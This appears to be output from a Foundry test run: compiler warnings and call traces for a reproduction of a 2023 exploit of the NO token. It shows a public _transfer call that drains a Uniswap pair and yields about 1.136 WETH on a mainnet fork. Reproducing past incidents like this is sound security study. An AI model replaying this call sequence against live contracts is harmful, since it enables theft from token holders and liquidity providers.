Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.19s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-05/NOON_exp.sol:30:5:
   |
30 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2023-05/NOON_exp.sol:58:9:
   |
58 |         flashbotsBuilder.call{value: 0.000000001 ether}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 847.34ms (3.64ms CPU time)

Ran 1 test for src/test/2023-05/NOON_exp.sol:ContractTest
[PASS] testTransfer() (gas: 130425)
Logs:
  Attacker amount of WETH before exploitation of vulnerability: 0.000000000000000000
  Attacker amount of WETH after exploitation of vulnerability: 1.136449063099364001

Traces:
  [17989] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 17366979 [1.736e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(NO: [0x6fEAc5F3792065b21f85BC118D891b33e0673bD8], "NO")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93], "Pair")
    │   └─ ← [Return]
    ├─ [0] VM::label(Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], "Router")
    │   └─ ← [Return]
    └─ ← [Stop]

  [158725] ContractTest::testTransfer()
    ├─ [2534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker amount of WETH before exploitation of vulnerability", val: 0, decimals: 18)
    ├─ [2469] NO::balanceOf(Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93])
    │   └─ ← [Return] 88104775387217598184058610577 [8.81e28]
    ├─ [28433] NO::_transfer(Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 88104775387217598184058610576 [8.81e28])
    │   ├─ emit Transfer(from: Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 88104775387217598184058610576 [8.81e28])
    │   ├─  storage changes:
    │   │   @ 0x24eef9dacc17bf33d76699e2204ff0f6bc153c52970ed425af42c7b904bca054: 0x00000000000000000000000000000000000000011cae8fe40ef5a9796b216391 → 1
    │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x00000000000000000000000000000000000000011cae8fe40ef5a9796b216390
    │   └─ ← [Stop]
    ├─ [30737] Pair::sync()
    │   ├─ [469] NO::balanceOf(Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [2534] WETH::balanceOf(Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93]) [staticcall]
    │   │   └─ ← [Return] 1136449063099364002 [1.136e18]
    │   ├─ emit Sync(reserve0: 1, reserve1: 1136449063099364002 [1.136e18])
    │   ├─  storage changes:
    │   │   @ 10: 0x00000000000000000000000055eb040554d76b8a919a255456d1a55e27856bf4 → 0x0000000000000000000000009dd68aa8b1d14d719cb04551d81691aa918fc46c
    │   │   @ 8: 0x6475053b0000000000000fc57a66d75cf2a200011cae8fe40ef5a9796b216391 → 0x647509370000000000000fc57a66d75cf2a20000000000000000000000000001
    │   │   @ 9: 0x0000000000000000000000000000000000000000003f673a078855c8690421a0 → 0x00000000000000000000000000000000000000000077e94ba17df04638541618
    │   └─ ← [Stop]
    ├─ [469] NO::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   └─ ← [Return] 88104775387217598184058610576 [8.81e28]
    ├─ [4430] NO::transfer(Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93], 88104775387217598184058610576 [8.81e28])
    │   ├─ [3733] NO::_transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93], 88104775387217598184058610576 [8.81e28])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93], value: 88104775387217598184058610576 [8.81e28])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x00000000000000000000000000000000000000011cae8fe40ef5a9796b216390 → 0
    │   │   │   @ 0x24eef9dacc17bf33d76699e2204ff0f6bc153c52970ed425af42c7b904bca054: 1 → 0x00000000000000000000000000000000000000011cae8fe40ef5a9796b216391
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [504] Pair::getReserves() [staticcall]
    │   └─ ← [Return] 1, 1136449063099364002 [1.136e18], 1685391671 [1.685e9]
    ├─ [0] 0xDAFEA492D9c6733ae3d56b7Ed1ADB60692c98Bc5::fallback{value: 1000000000}()
    │   └─ ← [Stop]
    ├─ [469] NO::balanceOf(Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93])
    │   └─ ← [Return] 88104775387217598184058610577 [8.81e28]
    ├─ [1021] Router::getAmountOut(88104775387217598184058610576 [8.81e28], 1, 1136449063099364002 [1.136e18]) [staticcall]
    │   └─ ← [Return] 1136449063099364001 [1.136e18]
    ├─ [39072] Pair::swap(0, 1136449063099364001 [1.136e18], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [25962] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1136449063099364001 [1.136e18])
    │   │   ├─ emit Transfer(from: Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1136449063099364001 [1.136e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000000fc57a66d75cf2a1
    │   │   │   @ 0x686ed8e0e75e6588bd56fb46eabcfbe89731f104a018493f7d8493aa740b3e5a: 0x0000000000000000000000000000000000000000000000000fc57a66d75cf2a2 → 1
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [469] NO::balanceOf(Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93]) [staticcall]
    │   │   └─ ← [Return] 88104775387217598184058610577 [8.81e28]
    │   ├─ [534] WETH::balanceOf(Pair: [0x421A5671306CB5f66FF580573C1c8D536E266c93]) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ emit Sync(reserve0: 88104775387217598184058610577 [8.81e28], reserve1: 1)
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 88104775387217598184058610576 [8.81e28], amount1In: 0, amount0Out: 0, amount1Out: 1136449063099364001 [1.136e18], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x647509370000000000000fc57a66d75cf2a20000000000000000000000000001 → 0x64750937000000000000000000000000000100011cae8fe40ef5a9796b216391
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1136449063099364001 [1.136e18]
    ├─ [444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker amount of WETH after exploitation of vulnerability", val: 1136449063099364001 [1.136e18], decimals: 18)
    ├─  storage changes:
    │   @ 12: 0 → 1
    │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x00000000000000000000000000000000000000011cae8fe40ef5a9796b216390
    │   @ 0x24eef9dacc17bf33d76699e2204ff0f6bc153c52970ed425af42c7b904bca054: 1 → 0x00000000000000000000000000000000000000011cae8fe40ef5a9796b216391
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 12.05s (10.40s CPU time)

Ran 2 test suites in 12.06s (12.90s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
